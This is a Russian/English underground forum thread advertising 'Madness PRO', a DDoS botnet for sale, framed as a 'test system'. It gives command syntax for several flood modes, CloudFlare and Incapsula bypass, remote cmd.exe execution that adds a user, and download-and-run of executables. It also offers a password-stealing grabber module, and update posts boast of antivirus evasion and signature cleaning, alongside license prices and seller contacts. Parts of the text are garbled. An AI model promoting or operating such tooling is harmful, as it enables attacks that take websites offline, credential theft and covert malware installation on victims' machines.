Перейти к публикации
1
1
1
1
1
MrRaiX

[c++] Madness PRO DDoS test system

Рекомендованные сообщения

Madness PRO

Дата релиза: 01.09.2013

История создания:
Летом 2012-го года мы задумались о создании принципиально-нового ДДОС бота для тестирования собственных веб-ресурсов на отказоустойчивость, так как ни одна из протестированных систем не заслужила даже оценки "4".
Тестируемые семплы во время работы пожирали память, загружали процессор локальной машины, вылетали с ошибками, зависали на 50% загрузки CPU, неправильно делали записи в реестре, вызывали срабатывание защитных систем, множество весомых ошибок было найдено в панелях управления.
Для создания своей системы мы подробно изучили: BlackEnergy(исходный код), gbot (дисассемблинг), DirtJumper(дисассемблинг), Darkness Optima(исходный код, приобретен по договору), iBot(исходный код, приобретен по договору), w3Bot (исходный код), так же были изучены исходные коды Zeus и многих околотемных программ.

Возможности
- написан на C++, легко криптуется, имеет малый вес (сжатый семпл < 15кб)
- полная совместимость со всеми Windows семейства NT (x86 и x64)
- Бот имеет 7 типов атак
- стабильность в системе. Показатели нагрузки на CPU и ОЗУ очень равномерные.
- Не привлекает внимание UAC и Windows Firewall
- умеет устанавливать port, referal и cookies индивидуально для каждой цели
- поддерживает до 10-ти целей одновременно
- имеет очень низкую нагрузку на CPU благодаря новой, сложной системе парсинга команды (во всех аналогах парсинг проходит внутри функции, в множество потоков - это нагружает процессор лишней работой. Новый бот заносит все данные в массив до начала атаки и на функцю приходят уже готовые параметры: адрес, порт, реферал и т.д.)
- имеет колоссальную выходную мощь более 1500 http (и более 30 000 UDP) запросов в минуту за счет прямого взаимодействия с сетевыми драйверами даже на десктопных Windows! (только при использовании WinSock) Это примерно в 10 раз больше, чем некоторые аналоги и несколько больше лучших (по этому показателю) конкурентов.
- в панели управления отображаются: количество запросов в минуту, права в системе, версия системы.
- поддерживает обход CloudFlare защиты (!!!) и многих других, более простых.
- поддерживает Slow GET и Slow POST режимы!
- в заголовке пакета указывается отключение кеша (Cache-Control: no-cache), что увеличивает нагрузку на сервер.
- защита диалога бот-панель спецключем

Модули:
- PassGrabber (стилер): модуль находит и выгружает на сервер пароли от 26-ти программ(на октябрь 2014-го года).
цена $150 для базовой лицензии, $250 для лайт лицензии, бесплатно для полной.

Детектирование:
при проверке билда (без крипта и упаковки) только 3 антивируса из всех выдали подозрение (AVIRA, ClamAV, VBA32). Во время локальных тестов ключевые АВ: Kaspersky, Nod32, DrWeb, Avast пропустили файл в 100% случаев.
линк на результат: http://ya.ru***cookies$$$referal;"%5Dhttp://forum.ru/index.php%5B/url%5D *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script

• dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = %5Burl=""%5Dhttp://host.com/script.php%5B/url%5D @ @ @ = login & password = yyy hhh
• dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1
• dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text
• dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal
• cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = %5Burl=""%5Dhttp://site.ru/index.php%5B/url%5D, then (after fifteen minutes) cfa = %5Burl="http://site.ru/index.php"%5Dhttp://site.ru/index.php%5B/url%5D
• cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add
• exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = %5Burl="http://site.com/filename.exe"%5Dhttp://site.com/filename.exe%5B/url%5D

Control Panel:
We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it!

Demonstration:
how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power.

Prices:
- Test License %5Bb%5D$0%5B/b%5D (only for checking the forums and testers. updates not provided)
- Lite Licence %5Bb%5D$300%5B/b%5D (update/rebuild $100, upgrade to the new version $ 100)
- Basic License %5Bb%5D$500%5B/b%5D (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later)
- full license %5Bb%5D$950%5B/b%5D (all updates Rebuild and modules are free)

Discounts:
- 30% for owners Gbot / Andromeda / Dirt dumper, basic license ibot, base / silver license Darkness
- 50% for owners of gold and diamond license Darkness / ibot
- 20% extra for those who acquired the products listed above are not more than a week ago.

Payment
Accepted payment methods, WMR / WMZ / WMB, PM and BTC. as well as any currency through an currency exchanger.

Warranty:
Willing to work with the buyer to resolve any issues that may be encountered.

Contacts
- Seller 1 ICQ: %5Bb%5D902300%5B/b%5D JAB: %5Bemail="][email protected][/email]
- Seller 2 ICQ: 903400
- Seller 3 ICQ: 709750
- Project Manager ICQ: 395891570

Теги для гугла: бот, ддос, ддос бот, меднеес, меднесс бот, маднесс, маднесс бот, маднесс ддос, купить ддосер, маднесс купить, купить ддоса бота, купить ддос, Madness DdoS Bot, buy madness bot, Optima DDoS, DDoS Bot, Buy bot, лучший ддос бот, лучший DDoS бот, best DDoS bot, как заддосить, как сделать ддос, где заказати ддос, ддос услуги, как досить самому, программы для ддоса, сильнеший ддос бот, лучший ботнет, лучший троян, лучший ддос, купить троян, купить лоадер, купить кейлоггер, крутой бот, мегабот, где купить вирус, убить сайт, русская интернет армия, обход антиддос защит, положить сервер, убить игру, убить стрим, убить трансляцию, дудос, дудос сука, слоу ддос, slow ddos, обход UAC, UAC bypassyng, обход фаерволла, firewall bypassing 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Маленькая акция для любителей скидок и халявы!
Итак предлагаем:
2 базовые лицензии по цене $400 за шт (-$100)
1 лайт лицензию по цене $250 (-$50)
кодовая фраза "хочу лицензию со скидкой". Обращайтесь к любому из селлеров.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление 1.33
добавлено еще 4 шаблона антиддоса.

The updte 1.33
4 new anti-ddos presets added.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Код подчищен от АВ билд 1.33+
для купивших 1.33 - бесплатно.

The code cleaned - build 1.33+
Free for 1.33 buyers

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

На продажу выставляются две лицензии версии 1.33+ со скидкой:
Одна базовая лицензия за $330
Одна лайт лицензия за $200
Спрашивайте у селлеров, возможно вы окажитесь первым.

Two licence 1.33+ for sale with discount:
One base licence by $330
One lite licence by $200
Ask sellers, maybe u will be first!

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Последнее обновление в этом году - 1.34
Обе лицензии по акции проданы, пожалуйста ждите новых акций.
Действуют новогодние скидки!

The last update on this year - 1.34
Both licenses for the shares - sold, please wait for new shares.
Actual Christmas discounts!

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Новая ценовая политика:
С января 2015-го года изменены цены:
$250 - лайт лицензия
$350 - базовая лицензия
$550 - полная лицензия

$0 - модуль граббера для владельцев полной лицензии
$55 - модуль граббера для владельцев базовой лицензии
$100 - модуль граббера для владельцев лайт лицензии

$0 - ребилд для владельцев полной лицензии
$35 - ребилд для владельцев базовой лицензии
$75 - ребилд для владельцев лайт лицензии

$35 - переустановка панели управления


New price policy:
For january of 2015 price changed:
$250 - lite licence
$350 - base licence
$550 - full licence

$0 - grabber module for full licence owners
$55 - grabber module for base licence owners
$100 - grabber module for lite licence owners

$0 - rebuild for full licence owners
$35 - rebuild for base licence owners
$75 - rebuild for lite licence owners

$35 - Control Panel reinstall



Обновление 2.01!!!
Update 2.01!!!

Переводил с "кодерского" на русский сам, так что возможны оплошности ;)/>

Ядро:

[*] изменен дроп (реализация другими функциями)

[*] убрано удаление первоначального файла при дропе

[*] изменена автозагрузка, параметры

[*] изменено отслеживание состояния ключей реестра

[*] режим обновления

[*] изменен метод закрепления (улучшен в плане детектирования)

[*] заменен метод контроля URL и MasterKey

[*] изменен резолв

[*] изменен тайминг потоков

[*] изменена процедура ThreadsMain ядра, управляющая потоками нагрузки

[*] изменена процедура Synck ядра, управляющая потоком синхронизации

[*] изменено время синхронизации на 90 секунд

[*] изменен метод подсчета общей скорости атаки

[*] улучшен обход Windows 7/8/8.1 FireWall

[*] улучшен совместимость с Windows UAC

[*] режим совместимости с Windows 10

[*] хуки протекции

[*] новый, более правильный, метод очистки массивов

[*] новый поток для стабилизации потоков нагрузки, синхронизации потоков нагрузки, контроля утечек памяти

[*] добавлена защита от удаления из системы (уровень 3)

[*] добавлена защита от удаления из системы (уровень 4)

[*] изменено количество потоков

[*] алгоритм скорректирован относительно версии tcp стека целевой системы.

[*] убрана причина, по которой на некоторых системах возникала ошибка "работа этой программы прекращена"

[*] интелектуальный режим обучен работать по базам данных SQL автоматически.

[*] поток защиты от перегрузок

[*] исправлен base64 decode алгоритм (оптимизация, антидетектируемость)

dd1 mode

[*] в интеллектуальном режиме отсеиваются ссылки не принадлежащие целевому домену

[*] приоритет на скрипты PHP

[*] приоритет на формы логин/регистрация

[*] приоритет на основной домен перед поддоменами

[*] в заголовок пакета добавлены некоторые, необязательные параметры стандарта HTTP

[*] поддержка стресс MsSQL

[*] поддержка стресс MySQL

[*] мелкие фиксы заголовка пакета

[*] увеличен буфер на x64 системах


dc1 mode

[*] все изменения для режима dd1

[*] добавлено 14 пресетов

[*] 4 пресета для InCapsule

[*] 1 пресет для new CloudeFlare

[*] в заголовок пакета добавлены некоторые, необязательные параметры стандарта HTTP

[*] мелкие фиксы заголовка пакета

[*] увеличен буфер на x64 системах


ds1 mode

[*] все изменения для режима dd1

[*] улучшен метод перехода между открытыми/закрытыми соккетами

[*] лимитирован размер пакета для увеличения эффективности за счет количества открытых соединений

[*] поддержание статуса established

[*] в заголовок пакета добавлены некоторые, необязательные параметры стандарта HTTP

[*] мелкие фиксы заголовка пакета

[*] увеличен буфер на x64 системах


dd2 mode

[*] небольшой багфикс Post формы

[*] в заголовок пакета добавлены некоторые, необязательные параметры стандарта HTTP

[*] увеличен буфер на x64 системах


Grabber module

[*] добавлены методы поиска portable версий qip/opera/tc/ff по запущенным процессам

[*] исправлен алгоритм ИЕ (багфикс: азиатские локализации)

[*] добавлены актуальные версии opera new и firefox

[*] оптимизация алгоритмов поиска софта

[*] версии поддерживаемого софта актуальные

[*] багфикс найденных недоработок

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.02
* Мелкие фиксы ядра
* Улучшен модуль граббера, добавлен IM Pigdin
Не забывайте что цены снижены!

The update - 2.02
* Little fix of core
* IM Pidgin support added in grabber module.
Don't forget that prices reduced!

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Большое обновление - 2.03
* Улучшен граббер, изменен метод передачи данных
* В граббер добавлены 4 VNC сервера.
* Профиксен баг определения типа учетной записи под Вин8.1
* Многое другое...

The big update - 2.03
* Grabber updated, changed data transfer method
* 4 VNC servers support added to grabber
* Fixed bug (accounts rights on Win8.1)
* And more...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Большое обновление - 2.05
- более 50 мелких обновлений в ядре, в модуле работы с реестром (x64) под W10
- к грабберу добавлены ftp/ssh клиент WinSCP (все версии) и IM клиент PSi (все версии)



The big update - 2.05
- more 50 little fix's and updates in core, in registry module (x64) for W10
- grabbber now supported ftp/ssh client WinSPC (all vers) and IM clien PSI (all vers)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.05+
- чистка кода.

Акция:
* 3 лайт лицензии продаются по цене 150 usd (скидка 100 usd)!
* 1 базовая лицензия продается по цене 200 usd (скидка 150 usd)!


The update - 2.05+
- code cleaned.

Attention:
* 3 lite licence sold at a price of 150 usd (discount 100 usd)!
* 1 base licence sold at a price of 200 usd (discount 150 usd)!

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.06
- добавлено 3 новых пресета для обхода программного антиддоса


The update - 2.06
- added 3 new presets for software antiddos bypassing

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.06+
- Очистка сигнатур. Это обновление бесплатное для купивших 2.06


The update - 2.06+
- The signatures cleaned. This update free for 2.06 buyers.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.07
- Обновление, направленное на совместимость с Windows 10.
Задержка обновления связана с выходом ОС.

Внимание, промо-акции!
- 2 базовые лицензии со скидкой 50%!
- 1 лайт лицензия бесплатно!
Спрашивайте у селлеров, будьте первыми!


The update - 2.07
- update aimed at compatibility with Windows 10
The delay of the update associated with the release of the OS.

Attention, promotions!
- 2 basic licence with 50% discount!
- 1 lite licence for free!
Ask sellers, be the first!

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.07+
- плановая чистка сигнатур.
- обновление бесплатное для купивших 2.07

The update - 2.07+
- the planed signaturs ceaning.
- this update free for 2.07 buyers.

Возможна продажа исходных кодов или частей. дорого.

Контакты:

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.08
- плановая чистка сигнатур.
- немного изменен дроп.
- добавлен новый пресет по incapsula
- в модуль граббера добавлена поддержка актуальных версий софта.
- обновление бесплатное для купивших 2.07.

The update - 2.08
- the planed signaturs ceaning.
- the drop method little changed.
- added new preset for incapsula.
- the grabber module adds support for the newest versions of software.
- this update free for 2.07 buyers.

Возможна продажа исходных кодов или частей. дорого.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.08+
- код замаскирован от антивирусов

Акция: 3 базовые лицензии продаются по 180USD (скидка 170USD)
Подробности у селлеров.

The update - 2.08+
- the programm code is masked from antivirus detectors.

Возможна продажа исходных кодов или частей. дорого.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Обновление - 2.09
- плановое
- 2 пресета добавлено к режиму dc1
- бесплатное, для купивших 2.08

Акция по продаже лицензий со скидкой завершена.

The update - 2.09
- planed
- 2 presets added to dc1 mode
- free for 2.08 buyers.

Возможна продажа исходных кодов или частей. дорого.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×
×
  • Создать...